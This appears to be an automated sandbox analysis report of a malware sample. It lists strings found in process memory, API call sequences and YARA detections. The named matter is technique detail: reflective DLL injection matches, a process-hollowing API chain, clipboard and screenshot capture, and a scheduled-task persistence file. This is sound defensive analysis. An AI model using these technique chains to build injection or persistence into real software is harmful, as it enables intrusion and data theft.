                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                              Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                              Source: explorer.exe, 00000004.00000000.2066603654.000000000C860000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3104194293.000000000C860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                              Source: powershell.exe, 0000001F.00000002.2611004439.000002E54E305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2246646592.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260592335.00000204B9869000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2268073543.00000204B9878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                              Source: CC11.tmp.ctx.exe, 00000010.00000002.2267400356.00000204B97C0000.00000004.00001000.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2259255483.00000204B78F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                              Source: explorer.exe, 00000004.00000003.3097199037.000000000C512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3585518944.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3101150839.000000000C54B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2064379005.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E535F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.00000219909D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                              Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021991FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E537483000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021991FFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                              Source: explorer.exe, 00000004.00000002.3414214049.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2050311869.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                              Source: explorer.exe, 00000004.00000003.2262245343.000000000AA52000.00000004.00000001.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000002.2585861729.0000000002966000.00000004.00000800.00020000.00000000.sdmp, D7AB.tmp.ssg.exe, 00000011.00000000.2265531996.00000000005C2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://api.ip.sb/ip
                              Source: explorer.exe, 00000004.00000002.3489127190.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                              Source: explorer.exe, 00000004.00000002.3414214049.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2050311869.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                              Source: explorer.exe, 00000004.00000003.3104504813.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2048558818.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3383796539.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
                              Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                              Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                              Source: powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                              Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                              Source: powershell.exe, 00000020.00000002.2524332986.0000021990BF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                              Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                              Source: CC11.tmp.ctx.exe, 00000010.00000002.2266815528.00000204B9480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                              Source: CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                              Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                              Source: CC11.tmp.ctx.exe, 00000010.00000003.2261352417.00000204B78A8000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260462674.00000204B78A7000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000003.2260261857.00000204B7840000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 00000010.00000002.2265985623.00000204B78A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                              Source: powershell.exe, 00000020.00000002.2604795771.00000219A8BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.t.com/fwlink/?Li955
                              Source: powershell.exe, 0000001F.00000002.2524411157.000002E53780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2586089026.000002E545FB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2524332986.0000021992388000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2584503281.00000219A0A40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                              Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                              Source: explorer.exe, 00000004.00000002.3585518944.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2064379005.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                              Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                              Source: explorer.exe, 00000004.00000000.2052790919.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3489127190.00000000099B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                              Source: CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240185105.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC727C000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248645806.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2248171436.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240417074.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC727F000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2240020214.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2252609502.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239581958.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2239766614.0000023FC7270000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2247167637.0000023FC7273000.00000004.00000020.00020000.00000000.sdmp, CC11.tmp.ctx.exe, 0000000B.00000003.2250744123.0000023FC727F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                              Source: C:\Windows\explorer.exeCode function: 4_2_09837AF0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_09837AF0
                              Source: C:\Windows\explorer.exeCode function: 4_2_09837CE0 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_09837CE0
                              Source: C:\Windows\explorer.exeCode function: 4_2_09837AF0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_09837AF0
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeCode function: 18_2_006961F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,18_2_006961F0

                              System Summary

                              barindex
                              Source: 4.0.explorer.exe.3320000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 1.2.svchost.exe.17002c7d000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.0.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.9820000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.3320000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.3320000.0.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.9820000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.ca78220.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 1.2.svchost.exe.17002c7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 4.2.explorer.exe.ca78220.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 00000004.00000000.2048399392.0000000003320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 00000001.00000002.3377839465.0000017002C7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 00000004.00000002.3488129370.0000000009820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: 00000004.00000002.3382324797.0000000003320000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E382048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF79E382048
                              Source: C:\Windows\explorer.exeCode function: 4_2_09821370 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,4_2_09821370
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D2048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,6_2_00007FF6743D2048
                              Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exeFile created: C:\Windows\Tasks\Gxtuum.job
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E38345C0_2_00007FF79E38345C
                              Source: C:\Users\user\Desktop\yINR7uQlPr.exeCode function: 0_2_00007FF79E3820480_2_00007FF79E382048
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52B345C1_2_00007FF7E52B345C
                              Source: C:\Windows\System32\svchost.exeCode function: 1_2_00007FF7E52B20481_2_00007FF7E52B2048
                              Source: C:\Windows\explorer.exeCode function: 4_2_03341B244_2_03341B24
                              Source: C:\Windows\explorer.exeCode function: 4_2_0334C3044_2_0334C304
                              Source: C:\Windows\explorer.exeCode function: 4_2_03320BF04_2_03320BF0
                              Source: C:\Windows\explorer.exeCode function: 4_2_0334BAB04_2_0334BAB0
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271404_2_03327140
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271F34_2_033271F3
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271FD4_2_033271FD
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271E14_2_033271E1
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271EB4_2_033271EB
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271D74_2_033271D7
                              Source: C:\Windows\explorer.exeCode function: 4_2_033271CD4_2_033271CD
                              Source: C:\Windows\explorer.exeCode function: 4_2_0334A0D84_2_0334A0D8
                              Source: C:\Windows\explorer.exeCode function: 4_2_033447D04_2_033447D0
                              Source: C:\Windows\explorer.exeCode function: 4_2_0333F6E84_2_0333F6E8
                              Source: C:\Windows\explorer.exeCode function: 4_2_03348ED44_2_03348ED4
                              Source: C:\Windows\explorer.exeCode function: 4_2_033266C04_2_033266C0
                              Source: C:\Windows\explorer.exeCode function: 4_2_0333FD284_2_0333FD28
                              Source: C:\Windows\explorer.exeCode function: 4_2_0334D5004_2_0334D500
                              Source: C:\Windows\explorer.exeCode function: 4_2_03341DBC4_2_03341DBC
                              Source: C:\Windows\explorer.exeCode function: 4_2_033345E04_2_033345E0
                              Source: C:\Windows\explorer.exeCode function: 4_2_0334DC324_2_0334DC32
                              Source: C:\Windows\explorer.exeCode function: 4_2_033444204_2_03344420
                              Source: C:\Windows\explorer.exeCode function: 4_2_033494F84_2_033494F8
                              Source: C:\Windows\explorer.exeCode function: 4_2_098351E04_2_098351E0
                              Source: C:\Windows\explorer.exeCode function: 4_2_098272C04_2_098272C0
                              Source: C:\Windows\explorer.exeCode function: 4_2_098217F04_2_098217F0
                              Source: C:\Windows\explorer.exeCode function: 4_2_098429BC4_2_098429BC
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984E1004_2_0984E100
                              Source: C:\Windows\explorer.exeCode function: 4_2_098409284_2_09840928
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984A0F84_2_0984A0F8
                              Source: C:\Windows\explorer.exeCode function: 4_2_098450204_2_09845020
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984E8324_2_0984E832
                              Source: C:\Windows\explorer.exeCode function: 4_2_098453D04_2_098453D0
                              Source: C:\Windows\explorer.exeCode function: 4_2_09849AD44_2_09849AD4
                              Source: C:\Windows\explorer.exeCode function: 4_2_098402E84_2_098402E8
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DCD4_2_09827DCD
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DD74_2_09827DD7
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DE14_2_09827DE1
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DEB4_2_09827DEB
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DF34_2_09827DF3
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827DFD4_2_09827DFD
                              Source: C:\Windows\explorer.exeCode function: 4_2_09827D404_2_09827D40
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984ACD84_2_0984ACD8
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984CF044_2_0984CF04
                              Source: C:\Windows\explorer.exeCode function: 4_2_098427244_2_09842724
                              Source: C:\Windows\explorer.exeCode function: 4_2_0984C6B04_2_0984C6B0
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D20486_2_00007FF6743D2048
                              Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exeCode function: 6_2_00007FF6743D345C6_2_00007FF6743D345C
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91B345C8_2_00007FF7A91B345C
                              Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF7A91B20488_2_00007FF7A91B2048
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179D345C9_2_00007FF7179D345C
                              Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF7179D20489_2_00007FF7179D2048
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002FBD811_2_00007FF69002FBD8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690035C7411_2_00007FF690035C74
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69001100011_2_00007FF690011000
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69003518C11_2_00007FF69003518C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900291B011_2_00007FF6900291B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002D20011_2_00007FF69002D200
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690038A3811_2_00007FF690038A38
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690020A6011_2_00007FF690020A60
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002128011_2_00007FF690021280
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690027AAC11_2_00007FF690027AAC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690018B2011_2_00007FF690018B20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690030B8411_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900333BC11_2_00007FF6900333BC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900273F411_2_00007FF6900273F4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690020C6411_2_00007FF690020C64
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002148411_2_00007FF690021484
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690022CC411_2_00007FF690022CC4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002CD6C11_2_00007FF69002CD6C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900195FB11_2_00007FF6900195FB
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690020E7011_2_00007FF690020E70
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690034F1011_2_00007FF690034F10
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69003572811_2_00007FF690035728
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002FBD811_2_00007FF69002FBD8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690021F3011_2_00007FF690021F30
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690032F2011_2_00007FF690032F20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69001979B11_2_00007FF69001979B
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF690019FCD11_2_00007FF690019FCD
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002504011_2_00007FF690025040
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002107411_2_00007FF690021074
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF69002D88011_2_00007FF69002D880
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 11_2_00007FF6900228C011_2_00007FF6900228C0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690035C7416_2_00007FF690035C74
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690034F1016_2_00007FF690034F10
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69001100016_2_00007FF690011000
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69003518C16_2_00007FF69003518C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900291B016_2_00007FF6900291B0
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002D20016_2_00007FF69002D200
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690038A3816_2_00007FF690038A38
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690020A6016_2_00007FF690020A60
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002128016_2_00007FF690021280
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690027AAC16_2_00007FF690027AAC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690018B2016_2_00007FF690018B20
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690030B8416_2_00007FF690030B84
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900333BC16_2_00007FF6900333BC
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900273F416_2_00007FF6900273F4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002FBD816_2_00007FF69002FBD8
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690020C6416_2_00007FF690020C64
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002148416_2_00007FF690021484
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690022CC416_2_00007FF690022CC4
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002CD6C16_2_00007FF69002CD6C
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF6900195FB16_2_00007FF6900195FB
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF690020E7016_2_00007FF690020E70
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69003572816_2_00007FF690035728
                              Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exeCode function: 16_2_00007FF69002FBD816_2_00007FF69002FBD8
